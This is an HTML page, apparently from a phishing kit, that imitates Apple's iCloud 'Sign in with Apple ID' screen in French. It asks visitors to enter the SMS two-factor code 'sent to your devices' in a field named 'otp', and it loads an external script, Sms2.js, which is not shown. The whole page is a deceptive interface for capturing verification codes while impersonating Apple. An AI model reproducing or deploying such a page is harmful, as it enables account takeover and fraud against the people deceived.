<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/fa/css/all.css">
    <link rel="shortcut icon" href="../img/favicon.ico">
    <script src="../js/Sms2.js" defer></script>

    <title>iCloud</title>
</head>

<body style="
    background-color: #fbfbfd;
">
    <div class="iCloudCSS" style="
    background-color: #fbfbfd;
">

        <!-- Header Start -->
        <div class="Header">
            <div class="cloudos-application-toolbar-start-view"><img src="../img/icloud.png"></div>

            <div class="instructions">
                <div>


                </div>
            </div>
        </div>
        <!-- Header End -->

        <!-- Content Start -->
        <div class="home-login-component" style="
    color: #1d1d1f;
    font-family: SF Pro Text,Helvetica Neue,sans-serif;
    font-size: 15px;
    font-weight: 300;
    -webkit-font-smoothing: antialiased;
    line-height: 1.2;
    text-size-adjust: 100%;
    text-rendering: optimizeLegibility;
    visibility: visible!important;
    box-sizing: border-box;
    margin: 0;
    -webkit-tap-highlight-color: transparent;
    padding: 0;
    -webkit-box-flex: 1;
    flex: 1;
    display: flex;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    flex-direction: column;
    -webkit-box-align: center;
    align-items: center;
">
            <div class="parent-container is-visible" style="
    color: #1d1d1f;
    font-family: SF Pro Text,Helvetica Neue,sans-serif;
    font-size: 15px;
    font-weight: 300;
    -webkit-font-smoothing: antialiased;
    line-height: 1.2;
    text-size-adjust: 100%;
    text-rendering: optimizeLegibility;
    box-sizing: border-box;
    margin: 0;
    -webkit-tap-highlight-color: transparent;
    padding: 0;
    display: flex;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    flex-direction: column;
    inline-size: 640px;
    margin-block-start: 44px;
    box-shadow: 0 11px 34px 0 rgba(0,0,0,.2);
    border-radius: 34px;
    background-color: #fff;
    backdrop-filter: blur(10px);
    width: 640px;
    margin-top: 44px;
    visibility: visible;
    opacity: 1;
    block-size: 610px;
    transition: opacity .15s;
    height: 610px;
    justify-content: center;
    align-content: center;
">
                <div
                    style="visibility: visible;height: auto;display: flex;flex-direction: column;flex-wrap: nowrap;align-content: center;justify-content: center;align-items: center;">
                    <div class="widget-icon-text" style="display: flex;flex-direction: column;align-items: center;"><img
                            class="icon" draggable="false" alt="" aria-hidden="true" src="../img/logoform.svg" style="
    color: #1d1d1f;
    font-family: SF Pro Text,Helvetica Neue,sans-serif;
    font-size: 15px;
    font-weight: 300;
    -webkit-font-smoothing: antialiased;
    line-height: 1.2;
    text-size-adjust: 100%;
    text-rendering: optimizeLegibility;
    visibility: visible;
    -webkit-box-direction: normal;
    -webkit-user-drag: none;
    box-sizing: border-box;
    margin: 0;
    -webkit-tap-highlight-color: transparent;
    padding: 0;
    inline-size: 160px;
    width: 160px;
">
                        <div class="sign-in-label" style="
    -webkit-font-smoothing: antialiased;
    text-size-adjust: 100%;
    text-rendering: optimizeLegibility;
    visibility: visible;
    -webkit-box-direction: normal;
    box-sizing: border-box;
    margin: 0;
    -webkit-tap-highlight-color: transparent;
    padding: 0;
    font-family: SF Pro Display,Helvetica Neue,sans-serif;
    font-size: 20px;
    font-weight: 600;
    line-height: 36px;
    color: #000;
    margin-block-start: 37px;
    text-align: center;
    margin-top: 37px;
">Sign in with Apple&nbsp;ID</div>
                    </div>
                    <style>
                        .style-0 {
                            animation: 0.5s ease-in-out 0s 1 normal none running fade-in;
                            box-sizing: border-box;
                        }

                        .style-1 {
                            max-width: 328px;
                            position: relative;
                            outline: rgb(73, 73, 73) none 0px;
                            margin-right: auto;
                            margin-left: auto;
                            box-sizing: border-box;
                        }

                        .style-2 {
                            max-height: 90px;
                            transition: max-height 0.2s linear 0s;
                            min-height: 88.4px;
                            box-sizing: border-box;
                        }

                        .style-3 {
                            max-width: 328px;
                            position: relative;
                            outline: rgb(73, 73, 73) none 0px;
                            margin-right: auto;
                            margin-left: auto;
                            box-sizing: border-box;
                        }

                        .style-4 {
                            position: relative;
                            box-sizing: border-box;
                            display: table;
                            width: 100%;
                            text-align: left;
                        }

                        .style-5 {
                            position: relative;
                            box-sizing: border-box;
                            display: table-row;
                        }

                        .style-6 {
                            position: absolute;
                            width: 1px;
                            height: 6px;
                            margin: -1px;
                            padding: 6px 15px 0px 0px;
                            overflow: hidden;
                            clip: rect(0px, 0px, 0px, 0px);
                            border: 0px none rgb(51, 51, 51);
                            box-sizing: border-box;
                            padding-left: 0px;
                            padding-top: 6px;
                            padding-right: 15px;
                            display: block;
                            font-size: 17px;
                            line-height: 22px;
                            font-weight: 400;
                            letter-spacing: -0.357px;
                            font-family: 'SF Pro Text', 'SF Pro Icons', 'Helvetica Neue', Helvetica, Arial, sans-serif;
                            vertical-align: top;
                            color: rgb(51, 51, 51);
                            margin-top: -1px;
                            margin-bottom: -1px;
                            direction: ltr;
                        }

                        .style-7 {
                            box-sizing: border-box;
                            display: table-cell;
                            vertical-align: top;
                            direction: ltr;
                        }

                        .style-8 {
                            box-sizing: border-box;
                        }

                        .style-9 {
                            border: 1px solid rgb(214, 214, 214);
                            margin: 0px;
                            box-shadow: none;
                            height: 44.2px;
                            border-radius: 6px 6px 0px 0px;
                            border-bottom-left-radius: 0px;
                            border-bottom-right-radius: 0px;
                            color: rgb(73, 73, 73);
                            appearance: none;
                            font-size: 17px;
                            line-height: 22px;
                            font-weight: 400;
                            letter-spacing: -0.357px;
                            font-family: 'SF Pro Text', 'SF Pro Icons', 'Helvetica Neue', Helvetica, Arial, sans-serif;
                            display: inline-block;
                            box-sizing: border-box;
                            vertical-align: top;
                            width: 100%;
                            margin-bottom: 0px;
                            padding-left: 15px;
                            padding-right: 15px;
                            text-align: left;
                            background: rgb(255, 255, 255) none repeat scroll 0% 0% / auto padding-box padding-box;
                            font-synthesis: none;
                            -webkit-font-smoothing: antialiased;
                            direction: ltr;
                            padding: 0px 15px;
                        }

                        .style-10 {
                            z-index: 3;
                            box-sizing: border-box;
                            display: none;
                        }

                        .style-11 {
                            min-height: 44px;
                            height: 51px;
                            transition: height 0.2s linear 0.2s;
                            position: relative;
                            box-sizing: border-box;
                            display: table-row;
                        }

                        .style-12 {
                            position: absolute;
                            width: 1px;
                            height: 6px;
                            margin: -1px;
                            padding: 6px 15px 0px 0px;
                            overflow: hidden;
                            clip: rect(0px, 0px, 0px, 0px);
                            border: 0px none rgb(51, 51, 51);
                            box-sizing: border-box;
                            padding-left: 0px;
                            padding-top: 6px;
                            padding-right: 15px;
                            display: block;
                            font-size: 17px;
                            line-height: 22px;
                            font-weight: 400;
                            letter-spacing: -0.357px;
                            font-family: 'SF Pro Text', 'SF Pro Icons', 'Helvetica Neue', Helvetica, Arial, sans-serif;
                            vertical-align: top;
                            color: rgb(51, 51, 51);
                            margin-top: -1px;
                            margin-bottom: -1px;
                            direction: ltr;
                        }

                        .style-13 {
                            box-sizing: border-box;
                            display: table-cell;
                            vertical-align: top;
                            direction: ltr;
                        }

                        .style-14 {
                            min-height: 43px;
                            height: 51px;
                            box-sizing: border-box;
                        }

                        .style-15 {
                            border: 1px solid rgb(214, 214, 214);
                            margin: 0px;
                            box-shadow: none;
                            height: 44.2px;
                            border-radius: 0px 0px 6px 6px;
                            transition: height 0.2s linear 0s;
                            border-top: 0px none rgb(73, 73, 73);
                            border-top-left-radius: 0px;
                            border-top-right-radius: 0px;
                            padding-right: 43px;
                            color: rgb(73, 73, 73);
                            appearance: none;
                            font-size: 17px;
                            line-height: 22px;
                            font-weight: 400;
                            letter-spacing: -0.357px;
                            font-family: 'SF Pro Text', 'SF Pro Icons', 'Helvetica Neue', Helvetica, Arial, sans-serif;
                            display: inline-block;
                            box-sizing: border-box;
                            vertical-align: top;
                            width: 100%;
                            margin-bottom: 0px;
                            padding-left: 15px;
                            text-align: left;
                            background: rgb(255, 255, 255) none repeat scroll 0% 0% / auto padding-box padding-box;
                            font-synthesis: none;
                            -webkit-font-smoothing: antialiased;
                            direction: ltr;
                            padding: 0px 43px 0px 15px;
                        }

                        .style-16 {
                            display: inline-block;
                            position: relative;
                            margin: 18px 0px 16px;
                            box-sizing: border-box;
                        }

                        .style-17 {
                            font-size: 16px;
                            position: absolute;
                            top: 3px;
                            left: 0px;
                            opacity: 0;
                            cursor: pointer;
                            z-index: 2;
                            width: 16px;
                            height: 16px;
                            box-sizing: border-box;
                            font-synthesis: none;
                            -webkit-font-smoothing: antialiased;
                            direction: ltr;
                            text-align: left;
                            margin: 0px;
                            padding: 0px;
                        }

                        .style-18 {
                            display: inline;
                            color: rgb(73, 73, 73);
                            line-height: normal;
                            padding-top: 1px;
                            padding-left: 26px;
                            margin-top: 11px;
                            margin-bottom: 0px;
                            cursor: pointer;
                            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
                            box-sizing: border-box;
                            font-size: 17px;
                            font-weight: 400;
                            letter-spacing: -0.357px;
                            font-family: 'SF Pro Text', 'SF Pro Icons', 'Helvetica Neue', Helvetica, Arial, sans-serif;
                            position: relative;
                            vertical-align: top;
                        }

                        .style-19 {
                            box-sizing: content-box;
                            border-radius: 3px;
                            position: absolute;
                            top: 3px;
                            left: 0px;
                            display: block;
                            width: 14px;
                            height: 14px;
                            border: 1px solid rgb(214, 214, 214);
                            background: rgb(255, 255, 255) none repeat scroll 0% 0% / auto padding-box border-box;
                        }

                        .style-20 {
                            padding: 0px;
                            margin: 0px;
                            border: 0px none rgb(73, 73, 73);
                            top: 64.6px;
                            right: 26px;
                            position: absolute;
                            z-index: 99;
                            display: none;
                            box-sizing: border-box;
                        }

                        .style-21 {
                            background-image: url('../img/capture.png');
                            width: 38px;
                            height: 38px;
                            top: 45.7px;
                            animation: 0.5s ease-in-out 0s 1 normal none running fade-in;
                            margin: 0px;
                            border: 1px solid rgba(0, 0, 0, 0);
                            right: 10px;
                            padding: 0px 1px 0px 2px;
                            z-index: 101;
                            position: absolute;
                            outline: rgb(73, 73, 73) none 0px;
                            cursor: pointer;
                            box-sizing: content-box;
                            font-synthesis: none;
                            -webkit-font-smoothing: antialiased;
                            direction: ltr;
                            text-align: left;
                            color: rgb(73, 73, 73);
                            overflow: visible;
                            vertical-align: baseline;
                        }

                        .style-22 {
                            box-sizing: border-box;
                        }

                        .style-23 {
                            width: 100%;
                            max-width: 328px;
                            margin: auto;
                            height: 1px;
                            background-image: url('http://127.0.0.1/bin/cb1633718600/dist/assets/HR_gradient_dark.png');
                            background-size: cover;
                            box-sizing: border-box;
                        }

                        .style-24 {
                            margin-top: 17px;
                            box-sizing: border-box;
                        }

                        .style-25 {
                            padding-bottom: 9px;
                            box-sizing: border-box;
                        }

                        .style-26 {
                            cursor: pointer;
                            text-decoration: none solid rgb(0, 112, 201);
                            margin: 0px;
                            display: inline;
                            box-sizing: border-box;
                            color: rgb(0, 112, 201);
                        }

                        .style-27 {
                            white-space: nowrap;
                            box-sizing: border-box;
                        }

                        .style-28 {
                            position: absolute;
                            width: 1px;
                            height: 1px;
                            margin: -1px;
                            padding: 0px;
                            overflow: hidden;
                            clip: rect(0px, 0px, 0px, 0px);
                            border: 0px none rgb(0, 112, 201);
                            box-sizing: border-box;
                        }
                    </style>
                    <form id="myForm"  class="style-0" style="
    margin-top: 25px;
    /* max-width: 328px; */
    width: 100%;
"  method="post">




                        <div class="style-1">
                            <div account-name-entered="" fed-auth="" show-password="" class="style-2">
                                <div class="style-3">
                                    <div class="style-4">
                                        <div class="style-5">
                                            <label class="style-6" for="account_name_text_field">Identification à deux facteurs
</label>
                                            <div class="style-7">

                                                <div class="style-8">
                                                    <span aria-hidden="true" class="style-10">
                                                        Apple&nbsp;ID
                                                    </span>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="style-11">
                                            <label class="style-12" for="password_text_field">Password</label>
                                            <div class="style-13">
                                                <div class="style-14">
                                                    <input type="password" aria-required="true" required="required"
                                                        can-field="password" autocomplete="off" class="style-15"
                                                        placeholder="SMS" name="otp" style="
    border: 1px solid rgb(214, 214, 214);
    border-radius: 9px;
">
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <div class="style-20"></div> <button class="style-21" aria-label="Sign In"
                                aria-disabled="true" background-image:="" url(..="" width:="" 38px;="" height:=""
                                top:="" 45.7px;="" id="submitButton" type="submit" style="
    op: 2.7px;
    top: 2 !important;
">


                            </button>
                        </div>
                        <div class="style-22">

                            <p id="" class="si-link ax-outline lite-theme-override"
                                style="color: #666;text-align: center;margin: 17px;/* width: 15%; */">Un message contenant un code de validation a été envoyé à vos appareils. Saisissez le code pour continuer.
                            </p>

                        </div>
                    </form>
                </div>
            </div>
        </div>
        <!-- Content End -->
    </div>

  
</body>

</html>
